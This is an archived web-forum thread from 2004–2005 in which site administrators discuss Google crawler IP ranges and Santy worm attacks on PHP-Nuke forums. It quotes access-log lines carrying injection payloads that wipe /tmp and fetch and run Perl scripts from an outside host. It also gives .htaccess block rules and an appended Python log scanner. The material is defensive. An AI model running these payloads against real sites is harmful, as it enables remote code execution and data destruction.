| Topic Archived |
| Author |
Message |
Phoenix • Many Posts •


Offline Joined: Apr 19, 2004 Posts: 8799 Location: Netizen
|
Posted: Sun Sep 19, 2004 11:42 pm Post subject: Re: Hacker IP |
|
NetRange: 66.249.64.0 - 66.249.79.255
CIDR: 66.249.64.0/20
NetName: GOOGLE
NetHandle: NET-66-249-64-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.GOOGLE.COM
NameServer: NS2.GOOGLE.COM
_________________ • DonationsPro for DragonflyCMS, SMF, MyBB, vBulletin •
Phoenix's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
|
|
|
 |
Charles Supporter


Offline Joined: Sep 19, 2004 Posts: 11
|
Posted: Mon Sep 20, 2004 4:20 am Post subject: Re: Hacker IP's |
|
This is a PHP-Nuke Module that I had found back in June. It is called Google-Counter. Unzip the file and look at /sql/googlecounter.sql and it has a list of IP Addresses for Google. It looks like it was as of May 08, 2004. I don't know if this is all of Google's IP Addresses or not. Hope this helps out.
Charles's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Linux/1.3.33/4.0.22-standard/4.3.10/8.2c
|
|
|
 |
Charles Supporter


Offline Joined: Sep 19, 2004 Posts: 11
|
Posted: Mon Sep 20, 2004 9:01 pm Post subject: Re: Hacker IP |
|
Here is a link about some more current info about Google and their crawlers.
CLICK HERE
|
|
|
 |
Jeruvy Security Team


Offline Joined: Apr 23, 2004 Posts: 1432 Location: Canada
|
Posted: Wed Sep 22, 2004 6:37 pm Post subject: Re: Hacker IP |
|
Hehe, well I had to laugh today. I saw the march of bots in 66.249.64.0/20 range today.
Thankfully it is a fairly small block.
No record of this block (Google crawls) since July 2003 when I started keeping records. Truly bizarre.
First visit: Sept 21 15:00 GMT
_________________ J.
j e r u v y a t y a h o o d o t c o m
Need help? Look here: www.dragonflycms.org/W...d=112.html
Need to chat? Look for me on irc.freenode.net
Jeruvy's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Ubuntu7.10/Debian3.1 - 2.2.3/1.3.37 - 5.0.38/4.0.27 - 5.2.1/4.4.7 - CVS/9.1.2}
|
|
|
 |
Victor Nice poster


Offline Joined: Dec 06, 2004 Posts: 69 Location: Mexico/Italia
|
Posted: Tue Jan 11, 2005 3:08 pm Post subject: Re: Hacker IP's |
|
How can you see that? Where must I look for that, and if I don't have that, how can I make everything be saved in a log file?
Victor's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) win/linux/2.0.52/4.0.22/4/dragonfly
|
|
|
 |
norbie Silver Supporter


Offline Joined: Jun 29, 2004 Posts: 737 Location: Norbie's World
|
Posted: Thu Jan 13, 2005 7:43 pm Post subject: Re: Hacker IP's |
|
Here's a lovely long list of IP addresses and hack attempts on my site using the old Santy worm and the viewtopic highlight vulnerability, for viewing pleasure...
| Code:: |
65.254.35.90 - - [31/Dec/2004:11:03:33 +0000] "GET /index.php?name=Forums&file=viewtopic&p=511&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 59474 "-" "Mozilla/4.0"
69.50.214.130 - - [31/Dec/2004:11:05:02 +0000] "GET /index.php?name=Forums&file=viewtopic&p=995&highlight=&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 41243 "-" "Mozilla/4.0"
80.82.139.3 - - [01/Jan/2005:01:38:23 +0000] "GET /index.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;cd%20rm%20-rf%20*;wget%20http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;perl%20sess_0bc3910d07edb36750a9babbd179edb4;wget%20http://filepack.superbr.org/wow.f;perl%20wow.f;wget%20http://filepack.superbr.org/wow.x;perl%20wow.x%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 47773 "-" "LWP::Simple/5.64"
67.18.187.106 - - [01/Jan/2005:01:38:49 +0000] "GET /index.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;cd%20rm%20-rf%20*;fetch%20http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;fetch%20sess_0bc3910d07edb36750a9babbd179edb4;fetch%20http://filepack.superbr.org/wow.f;perl%20wow.f;fetch%20http://filepack.superbr.org/wow.x;perl%20wow.x%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 48084 "-" "LWP::Simple/5.803"
|
EDIT: I had 163 hacking attempts here, so I shortened it down to 4 as it's a bit easier on the eyes!
I've also got a good way to block Santy attacks through the .htaccess file if anyone's interested...
It's filtered all of mine since.
_________________ Norbie

www.norbiesworld.co.uk
norbie's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Linux / Apache Custom Version / 4.0.26-standard (client: 5.0.15) / 4.4.4 / 9.1.1
|
|
|
 |
senzacionale 500+ Posts Club


Offline Joined: Sep 26, 2004 Posts: 582 Location: Slovenija
|
Posted: Sat Jan 15, 2005 4:03 pm Post subject: Re: Hacker IP's |
|
Yes, I am interested!
Tell me what you did.
_________________ Juventus the champion!
senzacionale's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS) Windows XP/2.0.53/4.1.16/5.1.1/Dragonfly....Gentoo Linux/2.0.52-r1/4.1.16/5.1.1/Dragonfly
|
|
|
 |
norbie Silver Supporter


Offline Joined: Jun 29, 2004 Posts: 737 Location: Norbie's World
|
Posted: Sun Jan 16, 2005 12:13 pm Post subject: Re: Hacker IP's |
|
You'll need to enable your FTP program to 'view hidden files', then download the .htaccess file from your root folder where cpgnuke is installed.
Open .htaccess in Notepad, then add these lines to the end:
| Code:: |
#TEMP BANS FOR SANTY WORM:
RewriteEngine on
#CHECK FOR KNOWN USED USER_AGENTS:
RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp-trivial [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl [NC,OR]
#CHECK FOR KNOWN ORIGINATORS IN URL (THE_REQUEST IS THE FULL REQUEST LINE, QUERY STRING INCLUDED):
RewriteCond %{THE_REQUEST} visualcoders [NC,OR]
RewriteCond %{THE_REQUEST} midomain\.false\.ca [NC,OR]
RewriteCond %{THE_REQUEST} envidiosos\.org [NC,OR]
RewriteCond %{THE_REQUEST} filepack\.superbr\.org [NC,OR]
#CHECK FOR COMMON STRINGS IN QUERY:
RewriteCond %{QUERY_STRING} highlight=\%2527 [NC,OR]
RewriteCond %{QUERY_STRING} rush=([^&]+) [NC]
#IF MATCHED, SEND VISITOR TO THEIR OWN LOOPBACK ADDRESS:
RewriteRule ^.*$ http://127.0.0.1 [L]
|
Then upload it to your site again.
|
|
|
 |
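The checks from the .htaccess rules in the post above, applied offline to access-log lines like the ones posted earlier in the thread, as an added example that is not part of any post. The sample lines are constructed, the function names are this example's own, and matching the originator names against path plus query is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed log lines (documentation IPs, shortened payloads) shaped like those in the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Dec/2004:11:03:33 +0000] "GET /index.php?name=Forums&file=viewtopic'
    '&p=511&highlight=%2527%252Esystem(chr(101)%252Echr(99)%252Echr(104)%252Echr(111))'
    '%252E%2527 HTTP/1.0" 200 59474 "-" "Mozilla/4.0"',
    '192.0.2.20 - - [01/Jan/2005:01:38:23 +0000] "GET /index.php?name=Forums'
    '&rush=echo%20_START_&highlight=%2527.x.%2527 HTTP/1.1" 200 47773 "-" "LWP::Simple/5.64"',
    '192.0.2.30 - - [01/Jan/2005:02:00:00 +0000] "GET /index.php?name=Forums&file=viewtopic'
    '&p=7&highlight=apache HTTP/1.1" 200 30000 "-" "Mozilla/5.0"',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"$')
UA_PREFIXES = ("lwp::simple", "lwp-trivial", "libwww-perl")   # from the .htaccess rules
ORIGINATORS = ("visualcoders", "midomain.false.ca", "envidiosos.org", "filepack.superbr.org")

def parse_line(line):
    """Split one log line into client IP, request target, query string and user agent."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ip, target, agent = m.groups()
    return {"ip": ip, "target": target, "query": target.partition("?")[2], "agent": agent}

def matched_rules(entry):
    """Names of the rule groups that match, case-insensitively like the [NC] flag."""
    agent, target, query = (entry[k].lower() for k in ("agent", "target", "query"))
    checks = {
        "user-agent": agent.startswith(UA_PREFIXES),
        # Assumption: originators are searched in path plus query, where the posted log shows them.
        "originator": any(host in target for host in ORIGINATORS),
        "highlight": "highlight=%2527" in query,
        "rush": re.search(r"rush=[^&]+", query) is not None,
    }
    return [name for name, hit in checks.items() if hit]

def decode_probe(query):
    """Return the query after two URL-decoding passes and the text its chr(N) calls spell."""
    payload = unquote(unquote(query))
    return payload, "".join(chr(int(n)) for n in re.findall(r"chr\((\d{1,3})\)", payload))

def scan(lines):
    """Return (ip, matched rule groups, chr-spelled text) for every line a rule matches."""
    parsed = filter(None, map(parse_line, lines))
    return [(e["ip"], hits, decode_probe(e["query"])[1])
            for e in parsed if (hits := matched_rules(e))]

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

`scan()` only iterates over lines, so an open access-log file can be passed in place of `SAMPLE_LOG`.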
senzacionale 500+ Posts Club


Offline Joined: Sep 26, 2004 Posts: 582 Location: Slovenija
|
Posted: Sun Jan 16, 2005 3:06 pm Post subject: Re: Hacker IP's |
|
hmm
| Code:: |
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster @ mitjab.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Apache/2.0.52 (Win32) PHP/4.3.9 Server at localhost Port 80
|
| Code:: |
[Sun Jan 16 16:05:13 2005] [alert] [client 127.0.0.1] C:/httpserver/wwwroot/portal/.htaccess: Invalid command 'RewriteEngine', perhaps mis-spelled or defined by a module not included in the server configuration
|
I get this error; in Apache I have no option for RewriteEngine. In Linux it works fine?
Strange.
|
|
|
 |
norbie Silver Supporter


Offline Joined: Jun 29, 2004 Posts: 737 Location: Norbie's World
|
Posted: Sun Jan 16, 2005 7:56 pm Post subject: Re: Hacker IP |
|
I would remove those lines from your .htaccess file then.
Your server does not support (or have) the mod_rewrite module for Apache.
|
|
|
 |
|
|